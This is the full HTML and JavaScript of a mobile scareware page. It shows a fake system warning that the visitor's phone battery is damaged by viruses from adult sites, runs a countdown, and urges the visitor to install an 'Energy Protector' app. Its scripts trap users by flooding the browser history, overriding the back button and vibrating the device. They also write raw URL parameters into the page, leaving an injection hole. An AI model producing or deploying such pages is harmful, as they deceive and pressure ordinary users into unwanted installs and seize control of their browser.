 <!DOCTYPE html>
<html>
<head>
    <base href="">
    <!--<script id="_SFR_xl" src="preloaderrs.js"></script>-->

    <meta charset="utf-8">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <title>(1) Warning!</title>
    <link href="css/css.css?v=7" rel="stylesheet" />
    <style>#timer p, p {
        color: #555
    }

    #error, #timer {
        display: inline-block;
        float: left
    }

    #timer p, .btn {
        font-weight: 700
    }

    body {
        font-family: sans-serif
    }

    a {
        text-decoration: none
    }

    footer, header, section {
        clear: both
    }

    * {
        margin: 0;
        padding: 0
    }

    #wrapper {
        margin: 30px auto;
        max-width: 400px;
        border: 0px solid #303030;
        border-radius: 0px
    }


    h1 {
        font-size: 20px
    }

    p {
        font-size: 14px;
        padding: 5px 0
    }

    #timer {
        max-width: 290px;
        width: 65%
    }

    #timer p {
        font-size: 12px
    }

    #error {
        max-width: 120px;
        width: 35%
    }

    #error img {
        width: 100%
    }

    .btn {
        background-color: #6d96f1;
        border-radius: 5px;
        color: #fff;
        display: block;
        line-height: 50px;
        max-width: 275px;
        width: 90%
    }

    .red {
        color: red
    }

    .container {
        padding-left: 8px;
        padding-right: 8px;
    }
    </style>
    <script>
        !function () {
            var t;
            try {
                for (t = 0; 10 > t; ++t)history.pushState({}, "", "#");
                onpopstate = function (t) {
                    t.state && location.replace("#")
                }
            }
            catch (o) {
            }
        }();
        navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
        navigator.vibrate([1000]);
        function goto() {
            location.href = "http://www.baidu.com"
        }
    </script>
    <script language="JavaScript" type="text/javascript">
        <!--
        var sec = 05; // set the seconds
        var min = 01; // set the minutes
        function countDown() {
            sec--;
            if (sec == -01) {
                sec = 59;
                min = min - 1;
            }
            else {
                min = min;
            }

            if (sec <= 9) {
                sec = "0" + sec;
            }

            time = (min <= 9 ? "" + min : min) + " minutes and " + sec + " seconds";

            if (document.getElementById) {
                document.getElementById('theTime').innerHTML = time;
            }

            SD = window.setTimeout("countDown();", 1000);
            if (min == '00' && sec == '00') {
                sec = "00";
                window.clearTimeout(SD);
            }
        }
       // window.onload = countDown;
        // -->
    </script>
    <script>
        function getURLParameter(name) {
            return decodeURI(
                    (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
            );
        }
    </script>
    <!--<script data-type="injected" src="content_site"></script>-->
    <!--<script src="show_ads.js" type="text/javascript"></script>-->
    <style type="text/css">.priam_ads_by {
        display: none !important
    }</style>
</head>
<body  style="position: relative; overflow: visible; ">
<div onclick="goto()" id="wrapper" style="display: none; background: #fff">
    <div class="container">
        <header><img src="design.png" alt=""></header>
        <section><h1>Your battery is badly damaged by (4) virus!</h1>
        </section>
        <section>
            <div id="timer">
                <p><span class="red">We have detected that your <script>document.write(getURLParameter('brand'))</script><script>document.write(getURLParameter('model'))</script> is <span class="redbold">78.1% DAMAGED</span> because of <b>(4) malicious virus from recent adult sites.</b> It will soon use up your battery energy. </span>
                </p>
                <p>
                </p>
                <span style="font-size:20px;font-weight:bold;color:red;font-family:sans-serif;"
                      id="theTime"></span><br>
                <p>
                </p>
            </div>
            <div id="error"><img src="1.png" alt=""></div>
        </section>
        <section>
            <p><b>If you do not remove the virus now, this virus will consume your battery energy very
                fast. <br><br>
                Here's what you should do: </b>
                <br>
                <br>
                <strong>Step 1:</strong> Tap the button and install <strong>"Energy Protector"</strong> for free on
                Google Play.
                <br>
                <br>
                <strong>Step 2: </strong>Run the app to remove all virus to repair your battery.
                <br><br>


                <br></p>
            <p></p>

        </section>
        <footer>
            <p align="center"><a class="btn" href="http://www.baidu.com">Protect battery energy now</a></p>
        </footer>
    </div>
    <a href="http://http://www.baidu.com"><img height="0" weight="0"></a>
    <script>
        //alerter on start
       // alert("WARNING!\n\nYour Samsung Galaxy Note 3 is infected with virus and battery has been damaged! virus must be removed immediately.\n\nContinue with instructions to fix phone. Do not close window.\n\n**Exit at your own risk**");
    </script>
    <script type="text/javascript" src="backfix.min.js"></script>
    <script type="text/javascript">
        bajb_backdetect.OnBack = function () {
            window.history.back = function () {
                document.location = ''
            }
        }
    </script>

</div>
<div class="k_alert" id="kAlert">
    <h1>SYSTEM WARNING!</h1>
    <div id="kAlertP">
        <p>Your <script>document.write(getURLParameter('brand'))</script><script>document.write(getURLParameter('model'))</script> is infected with virus and battery has been damaged. Virus must be removed immediately!</p>
        <p> Continue with instructions to fix the battery. Do not close window.</p>
    </div>
    <a class="k_btn" id="kBtn2"  >OK</a>
</div>
<div id="body">
<img src="images/1.png" class="timg" />
<div id="cover"></div>

</div>
<script type="text/javascript">
    window.onload=function(){
        var kAlert=document.getElementById("kAlert");
        var kBtn2=document.getElementById("kBtn2");
        var cover=document.getElementById("cover");
        var obody=document.getElementById("body");
        var wrapp=document.getElementById("wrapper");
        var timer=null;
        timer=setTimeout(function(){

//            kAlert.style.display="none";
            cover.style.display="none";
            obody.style.display="none";

        },3000);
        setTimeout(function(){
            wrapp.style.display="block";
        },4500);
        setTimeout(function(){
            kAlert.style.display="block";
            kBtn2.onclick = function () {
                kAlert.style.display="none";
                countDown();
            }
        },3500);

//        obody.ontouchstart=obody.ontouchclick=function(){
//            clearTimeout(timer);
//            kAlert.style.display="block";
//            cover.style.display="block";
//        }

    }
</script>
</body>
</html>